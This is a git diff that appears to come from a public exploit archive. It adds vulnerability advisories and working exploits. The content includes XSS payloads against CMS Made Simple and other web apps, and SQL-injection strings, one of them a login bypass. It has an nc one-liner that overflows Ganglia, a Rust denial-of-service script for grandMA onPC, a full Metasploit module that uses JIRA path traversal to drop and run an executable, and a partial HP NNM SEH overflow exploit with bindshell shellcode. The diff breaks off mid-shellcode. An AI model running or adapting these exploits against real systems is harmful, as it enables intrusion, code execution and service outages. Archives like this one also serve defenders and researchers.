attacks are also possible. + +The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Versions prior to LemonLDAP::NG 0.9.3.2 are vulnerable. + +http://www.example.com/index.pl?url=";>alert("Running+code+within+the_context+of+"%2bdocument.domain) \ No newline at end of file diff --git a/platforms/hardware/webapps/32703.txt b/platforms/hardware/webapps/32703.txt new file mode 100755 index 000000000..b15741242 --- /dev/null +++ b/platforms/hardware/webapps/32703.txt @@ -0,0 +1,251 @@ +Document Title: +=============== +Private Photo+Video v1.1 Pro iOS - Persistent Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1249 + + +Release Date: +============= +2014-04-01 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1249 + + +Common Vulnerability Scoring System: +==================================== +3.8 + + +Product & Service Introduction: +=============================== +Image Downloader Pro helps you easily download unlimited images to your iPhone, FAST and CONVENIENTLY. You can easily download +your favourite photos and instantly view them on your iPhone ANYTIME, ANYWHERE. + +It is pretty HANDY! A collection of helpful photo websites are there waiting for you. You can see what`s happening and easily +download your favourite moment. What you need to do is just to click one of the bookmarks and then click `download` when your +favorite photos hop out ! + +Other features: +- Bookmarks of various photo websites are ready here +- You can enjoy the amazingly fast downloading +- You can still make the largest album of your own favorite photos + +(Copy of the Homepage: https://itunes.apple.com/us/app/private-photo+video-pro-secret/id518972230 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered a persistent validation web vulnerability in the official Private Photo+Video v1.1 Pro iOS mobile web-application. + + +Vulnerability Disclosure Timeline: +================================== +2014-04-01: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Free Music Download, Pro Downloader, Player & Lite Manager +Product: Private Photo+Video Pro - iOS Mobile Web Application 1.1 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Technical Details & Description: +================================ +A persistent input validation web vulnerability has been discovered in the official Private Photo+Video v1.1 Pro iOS mobile web-application. +The bug allows remote attackers to inject own malicious persistent script codes to the application-side of the vulnerable service. + +The vulnerability is located in the name value of the add `New Album` input module. Remote attackers are able to inject own malicious +script codes to the album name value input. The attacker vector is persistent and the injetction request method is GET. The inject can +be done by an album rename/add via mobile sync or by the web-interface via new album function. The security risk of the persistent web +vulnerability is estimated as medium(+) with a cvss (common vulnerability scoring system) count of 3.7(+)|(-)3.8. + +Exploitation of the persistent web vulnerability requires low user interaction and a local low privileged mobile application account +or access to the local web interface service. Successful exploitation of the vulnerability results in persistent session hijacking (customers), +account steal via persistent web attacks, persistent phishing or persistent manipulation of module context. + +Request Method(s): + [+] GET + +Vulnerable Module(s): + [+] New Album + +Vulnerable Parameter(s): + [+] albumname > path value + +Affected Module(s): + [+] FileManager > Path Dir Index Listing + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerability in the album name value can be exploited by local attackers via album sync but also by +remote attackers via web interface. In both cases low user interaction is required to exploit the web vulnerability. To reproduce the issue +or for security demonstration follow the provided information and steps below to continue. + +PoC: JSON JQ Request + +Request +JSON: {"albums":[{"id":"3", "title":"Downloaded", "num":"0", "thumb":"/cgi/album/thumb/3", "password":"yes"}, +{"id":"137", "title":"%20'.[PERSISTENT INJECTED SCRIPT CODE!]>", "num":"0", "thumb":"/cgi/album/thumb/5", "password":"no"}]} + + +PoC: WiFi Manager (Path Dir Listing) > Albumname + +
+
+ +
+
+
+
+ +
+ +
+
+
+ +Note: The issue can be exploited by local attackers with physical device access (album sync) but also by remote attackers (wifi ui) via the `add new albums` module. + + +--- PoC Session Logs [GET] --- + +18:39:26.834[161ms][total 161ms] Status: 200[OK] +GET http://localhost:8080/cgi/album/list?0.18317864473383083 Load Flags[LOAD_BACKGROUND VALIDATE_ALWAYS ] Gr??e des Inhalts[103] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8080] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0] + Accept[application/json, text/javascript, */*] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + X-Requested-With[XMLHttpRequest] + Referer[http://localhost:8080/] + Connection[keep-alive] + Response Header: + Content-Length[103] + Connection[close] + + +18:39:26.999[58ms][total 58ms] Status: 200[OK] +GET http://localhost:8080/cgi/album/default?0.05696050392233898 Load Flags[LOAD_BACKGROUND ] Gr??e des Inhalts[55] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8080] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0] + Accept[application/json, text/javascript, */*] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + X-Requested-With[XMLHttpRequest] + Referer[http://localhost:8080/] + Connection[keep-alive] + Response Header: + Content-Length[55] + Connection[close] + + +18:40:27.389[140ms][total 140ms] Status: 200[OK] +GET http://localhost:8080/cgi/album/add/%5BPERSISTENT%20INJECTED%20SCRIPT%20CODE!%5D?0.6839441036305055 Load Flags[LOAD_BACKGROUND ] Gr??e des Inhalts[12] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8080] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0] + Accept[application/json, text/javascript, */*] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + X-Requested-With[XMLHttpRequest] + Referer[http://localhost:8080/] + Connection[keep-alive] + Response Header: + Content-Length[12] + Connection[close] + + +18:40:27.535[76ms][total 76ms] Status: 200[OK] +GET http://localhost:8080/cgi/album/list?0.4844814145331481 Load Flags[LOAD_BACKGROUND ] Gr??e des Inhalts[220] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8080] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0] + Accept[application/json, text/javascript, */*] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + X-Requested-With[XMLHttpRequest] + Referer[http://localhost:8080/] + Connection[keep-alive] + Response Header: + Content-Length[220] + Connection[close] + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a secure parse and encode of the albumname sync and album name add input values. +Encode the input and parse the +output in the path dir listing again to prevent further persistent script code injects. + + +Security Risk: +============== +The security risk of the persistent input validation web vulnerability is estimated as medium(+). + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- +Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business +profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some +states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation +may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases +or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and +other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), +modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright ? 2014 | Vulnerability Laboratory [Evolution Security] + + + +-- +VULNERABILITY LABORATORY RESEARCH TEAM +DOMAIN: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + + diff --git a/platforms/linux/dos/32726.txt b/platforms/linux/dos/32726.txt new file mode 100755 index 000000000..493472fa8 --- /dev/null +++ b/platforms/linux/dos/32726.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/33299/info + +Ganglia is prone to a remote stack-based buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied input. + +Attackers can leverage this issue to execute arbitrary code in the context of the application. Successful exploits will compromise the application and the underlying computer. Failed attacks will cause denial-of-service conditions. + +echo "/`python -c \"print \\"%s/%s\\" % ('a'*300,'b'*300)\"`" |nc localhost 8652 \ No newline at end of file diff --git a/platforms/linux/remote/32691.txt b/platforms/linux/remote/32691.txt new file mode 100755 index 000000000..ea1608bc0 --- /dev/null +++ b/platforms/linux/remote/32691.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/33066/info + +Audio File Library ('libaudiofile') is prone to a heap-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data. + +An attacker can exploit this issue to execute arbitrary machine code in the context of applications using the vulnerable library. Failed exploit attempts will likely cause denial-of-service conditions. + +This issue affects libaudiofile 0.2.6; other versions may also be vulnerable. + +http://www.exploit-db.com/sploits/32691.wav \ No newline at end of file diff --git a/platforms/php/webapps/32668.txt b/platforms/php/webapps/32668.txt new file mode 100755 index 000000000..7eab38468 --- /dev/null +++ b/platforms/php/webapps/32668.txt @@ -0,0 +1,104 @@ +Exploit Title : CMS Made Simple 1.11.10 Multiple XSS Vulnerability + +Google dork : N/A + +Date : 02/04/2014 + +Exploit Author : Blessen Thomas + +Vendor Homepage : http://www.cmsmadesimple.org/ + +Software Link : N/A + +Version : 1.11.10 + +Tested on : Windows 7 hosted in WAMP server + +Type of Application : open source content management system, + + + + + +Stored XSS : + +Login to the admin portal and access search functionality + +http://localhost/cmsmadesimple-1.11.10-full/index.php + +Here the " search " parameter is vulnerable to stored xss. + +Payload : + +'">> + '">> + CMS Made Simple Site + + + + + + +Reflected XSS : + +Login to the admin portal and click the "My Preferences" and click "My +account" section. + +Here , the "email address" parameter is vulnerable to reflected XSS. + +Payload : + +"";<" + +request : + +POST +http://127.0.0.1/cmsmadesimple-1.11.10-full/admin/myaccount.php?_sx_=1c8c76366630b299 +HTTP/1.1 + +Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) +Gecko/20100101 Firefox/28.0 Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: +http://127.0.0.1/cmsmadesimple-1.11.10-full/admin/myaccount.php?_sx_=1c8c76366630b299Cookie: +_sx_=1c8c76366630b299; cms_admin_user_id=1; +cms_passhash=fcb88b76587f0658cd2481a004312918; +CMSSESSIDd508249c=71ougg9mi3ikiilatfc0851no5 Connection: keep-alive +Content-Type: application/x-www-form-urlencoded Content-Length: 103 + +active_tab=maintab&user=test&password=&passwordagain=&firstname=&lastname=&email="";<"&submit_account=Submit + + +response : + +

My Account

+ +
+ + + + + + + +
+ + + +# thus succesfully changing the password to "test@123". This will only work if the password has never been changed since installation. +# +# +# Another location in the XAMPP application vulnerable to Cross site request forgery is the guestbook section http://localhost/xampp/guestbook-en.pl . + + http://localhost/xampp/guestbook-en.pl?f_name=spam&f_email=spam&f_text=spam + + dork: "inurl:xampp/guestbook-en.pl" + +[#]----------------------------------------------------------------[#] + +#EOF diff --git a/platforms/php/webapps/32724.txt b/platforms/php/webapps/32724.txt new file mode 100755 index 000000000..3a27a9c72 --- /dev/null +++ b/platforms/php/webapps/32724.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/33271/info + +Dark Age CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Dark Age CMS 0.2c beta is vulnerable; other versions may also be affected. + +The following example data is available: + +Username: x' OR 'x' = 'x'# +Password: anything \ No newline at end of file diff --git a/platforms/php/webapps/32727.txt b/platforms/php/webapps/32727.txt new file mode 100755 index 000000000..c79f88c58 --- /dev/null +++ b/platforms/php/webapps/32727.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/33300/info + +MKPortal is prone to multiple security vulnerabilities, including SQL-injection, HTML-injection, cross-site scripting, arbitrary-file-upload, and insecure-temporary-file-creation vulnerabilities. + +Attackers can exploit these issues to execute arbitrary script code in the context of the webserver, compromise the application, steal cookie-based authentication credentials from legitimate users of the site, modify the way the site is rendered, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks may also be possible. + +MKPortal 1.2.1 is vulnerable; other versions may also be affected. + +http://localhost/mkportal.1.2.1/index.php?ind=blog&op=edit_template',template=@@version,template2=' \ No newline at end of file diff --git a/platforms/php/webapps/32728.txt b/platforms/php/webapps/32728.txt new file mode 100755 index 000000000..8b38708c0 --- /dev/null +++ b/platforms/php/webapps/32728.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/33300/info + +MKPortal is prone to multiple security vulnerabilities, including SQL-injection, HTML-injection, cross-site scripting, arbitrary-file-upload, and insecure-temporary-file-creation vulnerabilities. + +Attackers can exploit these issues to execute arbitrary script code in the context of the webserver, compromise the application, steal cookie-based authentication credentials from legitimate users of the site, modify the way the site is rendered, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks may also be possible. + +MKPortal 1.2.1 is vulnerable; other versions may also be affected. + +http://localhost/mkportal.1.2.1/mkportal/modules/rss/handler_image.php +?i= \ No newline at end of file diff --git a/platforms/php/webapps/32732.txt b/platforms/php/webapps/32732.txt new file mode 100755 index 000000000..1330c25e0 --- /dev/null +++ b/platforms/php/webapps/32732.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/33309/info + +Masir Camp is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/?Culture=fa-IR&page=search&SearchKeywords=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/32733.txt b/platforms/php/webapps/32733.txt new file mode 100755 index 000000000..b34dde5ff --- /dev/null +++ b/platforms/php/webapps/32733.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/33310/info + +The 'w3bcms' application is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/[Path]/index.php?seite=20%2Egaestebuch&action=[SQL]&id=1 \ No newline at end of file diff --git a/platforms/windows/dos/32704.pl b/platforms/windows/dos/32704.pl new file mode 100755 index 000000000..a2a5b9ad2 --- /dev/null +++ b/platforms/windows/dos/32704.pl @@ -0,0 +1,88 @@ +?/* + +MA Lighting Technology grandMA onPC v6.808 Remote Denial of Service Exploit + + +Vendor: MA Lighting Technology GmbH +Product web page: http://www.malighting.com +Affected version: grandMA series 1 onPC Software 6.808 (6.801) + +Summary: The grandMA onPC software incorporates all functions of a grandMA +console and offers you its full potential on your notebook or PC. You can +use grandMA onPC for running, programming or offline pre-programming, as +well as a smart backup solution within the grandMA system. With the MA onPC +command wing and MA onPC fader wing MA Lighting has developed a sophisticated +hardware extension perfectly suited for the grandMA onPC software. + +Desc: grandMA onPC version 6.808 is exposed to a remote denial of service +issue when processing socket connection negotiation. This issue occurs when +the application handles a single malformed packet over TCP port 7003, resulting +in a crash. + +=========================================================================== + +(1324.be4): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=3535393f ebx=07279f80 ecx=35353937 edx=0c05f038 esi=3535393f edi=3535393b +eip=77ce22c2 esp=0c05ef7c ebp=0c05ef90 iopl=0 nv up ei pl nz ac pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216 +ntdll!RtlEnterCriticalSection+0x12: +77ce22c2 f00fba3000 lock btr dword ptr [eax],0 ds:002b:3535393f=???????? + +-- + +303.640 GMA : RR NEW STATION IN NETWORK 127.0.0.1(100) AS Standalone +367.147 SHAR: RPC COMMAND UNSUPPORTED CMD 542393671 from 127.0.0.1 +367.147 SHAR: SHARED_REMOTECALL NOT TERMINATED CORRECTLY ! +367.180 CC : ******* EXCEPTION ************************** +367.180 CC : * ACCESS_VIOLATION +367.180 CC : * EAX = 37363341 EBX = 6D856B0 +367.180 CC : * ECX = 37363339 EDX = B78F41C +367.180 CC : * ESI = 37363341 EDI = 3736333D +367.180 CC : * DESKTYP : GMA [Windows] +367.180 CC : * VERSION : 6.808 STREAMING : 6801 +367.180 CC : ******************************************** +367.240 CC : 0x775522c2 RtlEnterCriticalSection() + 0x12 + +=========================================================================== + + +Tested on: Microsoft Windows 7 Professional SP1 (EN) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2014-5183 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5183.php + + +31.03.2014 + +*/ + + +use std::io::net::ip::SocketAddr; +use std::io::net::tcp::TcpStream; + +fn bann() { + println!(" + +======================================+ + | grandMA onPC 6.808 Denial of Service | + |--------------------------------------| + | | + | ID: ZSL-2014-5183 | + +======================================+ + "); +} + +fn main() { + bann(); + println!("\n[*] Sending packet to local host on tcp port 7003\n"); + let addr = from_str::("127.0.0.1:7003").unwrap(); + let mut socket = TcpStream::connect(addr).unwrap(); + socket.write(bytes!("\x74\x30\x30\x74\x21")); + println!("[*] Crashed!\n"); +} diff --git a/platforms/windows/remote/32699.txt b/platforms/windows/remote/32699.txt new file mode 100755 index 000000000..7498b585f --- /dev/null +++ b/platforms/windows/remote/32699.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/33112/info + +Google Chrome is prone to an information-disclosure vulnerability because it fails to adequately validate server-issued instructions while in PASV (passive) mode. + +Attackers can exploit this issue to port-scan networks inside a victim computer's firewall. Information harvested may aid in further attacks. + +Google Chrome 1.0.154.36 is affected; other versions may also be vulnerable. + +http://www.exploit-db.com/sploits/32699.zip \ No newline at end of file diff --git a/platforms/windows/remote/32725.rb b/platforms/windows/remote/32725.rb new file mode 100755 index 000000000..5d0abef9e --- /dev/null +++ b/platforms/windows/remote/32725.rb @@ -0,0 +1,209 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'JIRA Issues Collector Directory Traversal', + 'Description' => %q{ + This module exploits a directory traversal flaw in JIRA 6.0.3. The vulnerability exists + in the issues collector code, while handling attachments provided by the user. It can be + exploited in Windows environments to get remote code execution. This module has been tested + successfully on JIRA 6.0.3 with Windows 2003 SP2 Server. + }, + 'Author' => + [ + 'Philippe Arteau', # Vulnerability Discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2014-2314'], + [ 'OSVDB', '103807' ], + [ 'BID', '65849' ], + [ 'URL', 'https://confluence.atlassian.com/display/JIRA/JIRA+Security+Advisory+2014-02-26' ], + [ 'URL', 'http://blog.h3xstream.com/2014/02/jira-path-traversal-explained.html' ] + ], + 'Privileged' => true, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Jira 6.0.3 / Windows 2003 SP2', + { + 'Arch' => ARCH_X86, + 'Platform' => 'win' + } + ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 26 2014')) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('TARGETURI', [true, 'Path to JIRA', '/']), + OptInt.new('COLLECTOR', [true, 'Collector ID']) + ], self.class) + + register_advanced_options( + [ + # By default C:\Program Files\Atlassian\JIRA\atlassian-jira\QhVRutsh.jsp + OptString.new('JIRA_PATH', [true, 'Path to the JIRA web folder from the Atlassian installation directory', "JIRA\\atlassian-jira"]), + # By default file written to C:\Program Files\Atlassian\Application Data\JIRA\caches\tmp_attachments\$random_\, we want to traversal until 'Atlassian' + OptInt.new('TRAVERSAL_DEPTH', [true, 'Traversal depth', 6]) + ], self.class) + end + + def get_upload_token + res = send_request_cgi( + { + 'uri' => normalize_uri(target_uri.path, "rest", "collectors", "1.0", "tempattachment", datastore['COLLECTOR']), + 'method' => 'POST', + 'data' => rand_text_alpha(10 + rand(10)), + 'vars_get' => + { + 'filename' => rand_text_alpha(10 + rand(10)) + } + }) + + if res and res.code == 500 and res.body =~ /"token":"(.*)"}/ + csrf_token = $1 + @cookie = res.get_cookies + else + csrf_token = "" + end + + return csrf_token + end + + def upload_file(filename, contents, csrf_token) + traversal = "..\\" * datastore['TRAVERSAL_DEPTH'] + traversal << datastore['JIRA_PATH'] + + res = send_request_cgi( + { + 'uri' => normalize_uri(target_uri.path, "rest", "collectors", "1.0", "tempattachment", datastore['COLLECTOR']), + 'method' => 'POST', + 'data' => contents, + 'cookie' => @cookie, + 'ctype' => 'text/plain', + 'vars_get' => + { + 'filename' => "#{traversal}\\#{filename}", + 'atl_token' => csrf_token + } + }) + + if res and res.code == 201 and res.body =~ /\{"name":".*#{filename}"/ + register_files_for_cleanup("..\\..\\#{datastore['JIRA_PATH']}\\#{filename}") + register_files_for_cleanup("..\\..\\#{datastore['JIRA_PATH']}\\#{@exe_filename}") + return true + else + print_error("#{peer} - Upload failed...") + return false + end + end + + def upload_and_run_jsp(filename, contents) + print_status("#{peer} - Getting a valid CSRF token...") + csrf_token = get_upload_token + fail_with(Failure::Unknown, "#{peer} - Unable to find the CSRF token") if csrf_token.empty? + + print_status("#{peer} - Exploiting traversal to upload JSP dropper...") + upload_file(filename, contents, csrf_token) + + print_status("#{peer} - Executing the dropper...") + send_request_cgi( + { + 'uri' => normalize_uri(target_uri.path, filename), + 'method' => 'GET' + }) + end + + def check + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'login.jsp'), + }) + + if res and res.code == 200 and res.body =~ // + version = $1 + else + return Exploit::CheckCode::Unknown + end + + if version <= "6.0.3" + return Exploit::CheckCode::Detected + end + + return Exploit::CheckCode::Safe + end + + def exploit + print_status("#{peer} - Generating EXE...") + exe = payload.encoded_exe + @exe_filename = Rex::Text.rand_text_alpha(8) + ".exe" + + print_status("#{peer} - Generating JSP dropper...") + dropper = jsp_drop_and_execute(exe, @exe_filename) + dropper_filename = Rex::Text.rand_text_alpha(8) + ".jsp" + + print_status("#{peer} - Uploading and running JSP dropper...") + upload_and_run_jsp(dropper_filename, dropper) + end + + # This should probably go in a mixin (by egypt) + def jsp_drop_bin(bin_data, output_file) + jspraw = %Q|<%@ page import="java.io.*" %>\n| + jspraw << %Q|<%\n| + jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n| + + jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n| + + jspraw << %Q|int numbytes = data.length();\n| + + jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n| + jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n| + jspraw << %Q|{\n| + jspraw << %Q| char char1 = (char) data.charAt(counter);\n| + jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n| + jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n| + jspraw << %Q| comb <<= 4;\n| + jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n| + jspraw << %Q| bytes[counter/2] = (byte)comb;\n| + jspraw << %Q|}\n| + + jspraw << %Q|outputstream.write(bytes);\n| + jspraw << %Q|outputstream.close();\n| + jspraw << %Q|%>\n| + + jspraw + end + + def jsp_execute_command(command) + jspraw = %Q|<%@ page import="java.io.*" %>\n| + jspraw << %Q|<%\n| + jspraw << %Q|try {\n| + jspraw << %Q| Runtime.getRuntime().exec("chmod +x #{command}");\n| + jspraw << %Q|} catch (IOException ioe) { }\n| + jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n| + jspraw << %Q|%>\n| + + jspraw + end + + def jsp_drop_and_execute(bin_data, output_file) + jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file) + end + +end \ No newline at end of file diff --git a/platforms/windows/remote/5342.py b/platforms/windows/remote/5342.py index f690ad0ba..74e4503fc 100755 --- a/platforms/windows/remote/5342.py +++ b/platforms/windows/remote/5342.py @@ -1,151 +1,151 @@ -#!/usr/bin/python -################################################################################ -# HP OpenView NNM 7.5.1 OVAS.EXE Pre Authentication SEH Overflow -# Tested on Windows 2003 Server SP1. -# Coded by Mati Aharoni -# muts..at..offensive-security.com -# http://www.offensive-security.com/0day/hp-nnm-ov.py.txt -# [shameless plug] -# This vulnerability was found, analysed and exploited -# as part of a training module in "BackTrack to the Max". -# http://www.offensive-security.com/ilt.php -# [/shameless plug] -################################################################################# -# bt 0day# python hp-nnm-ov.py -# [*] HP NNM 7.5.1 OVAS.exe SEH PRE AUTH Overflow Exploit (0day) -# [*] http://www.offensive-security.com -# [*] Sending evil HTTP request to NNMz, ph33r -# [*] Egghunter working ... -# [*] Check payload results - may take up to a minute. -# bt 0day# nc -v 192.168.1.111 4444 -# (muts) [192.168.1.111] 4444 (krb524) open -# Microsoft Windows [Version 5.2.3790] -# (C) Copyright 1985-2003 Microsoft Corp. -# -# C:\>whoami -# whoami -# nt authority\system -# -# C:\> -# -################################################################################ -# Insane, "We own all those registers, but how the heck do we get EIP" method. -################################################################################ -# crash = "T"*1300 -# -################################################################################# -# Funky, "Lets make the stack happy and pray for EIP" overwrite method. -################################################################################# -# Case 1 - Stack not happy: -# crash = "T"*989 -# -# Case 2 - Stack happy, we own EIP - blessed by the angels above: -# 0x44442638 - Happy NNM address -# crash = "T"*941 +"\x38\x26\x44\x44"+"\x42\x42\x42\x42" +"T"*12 +"\x41\x41\x41\x41" + "T"*24+":7510"+"\x41\x41\x41\x41" + "B"*24+":7510" -# 12 bytes of nasty strict alphanum shellcode possibility @EBP -# -################################################################################ -# Unknown "wtf, these bytes are expanding" SEH method: -################################################################################ -# 0x6d356c6e - POP POP RET somewhere in NNM -# crash = "\xeb"*1100+"A"*9+"\x41\x41\x41\x41"+"A"*1900+":7510" -# -################################################################################ -# Final exploit crash SEH method: -################################################################################ -# crash = "\xeb"*1101 +"\x41\x41\x41\x41\x77\x21\x6e\x6c\x35\x6d" + "G"*32 + egghunter +"A"*100+":7510" -# -################################################################################ - -import socket -import os -import sys - -print "[*] HP NNM 7.5.1 OVAS.exe SEH Overflow Exploit (0day)" -print "[*] http://www.offensive-security.com" - -# Alphanumeric egghunter shellcode + restricted chars \x40\x3f\x3a\x2f - ph33r -# One egg to rule them all. - -egghunter=( -"%JMNU%521*TX-1MUU-1KUU-5QUUP\AA%J" -"MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5" -"21*-q!au-q!au-oGSePAA%JMNU%521*-D" -"A~X-D4~X-H3xTPAA%JMNU%521*-qz1E-1" -"z1E-oRHEPAA%JMNU%521*-3s1--331--^" -"TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA" -"A%JMNU%521*-R222-1111-nZJ2PAA%JMN" -"U%521*-1-wD-1-wD-8$GwP") - -alignstack="\x90"*34+"\x83\xc4\x03" - -# win32_bind - EXITFUNC=thread LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com -# Spawned shell dies quickly as a result of a parent thread killing it. -# Best shellcodes are of the "instant" type, such as adduser, etc. - -bindshell=("T00WT00W" + alignstack + -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" -"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48" -"\x4e\x46\x46\x32\x46\x42\x4b\x48\x45\x54\x4e\x33\x4b\x38\x4e\x37" -"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x41\x4b\x48" -"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x58" -"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" -"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" -"\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48" -"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54" -"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x32\x4b\x38" -"\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x56\x43\x4c\x41\x53\x4b\x4d" 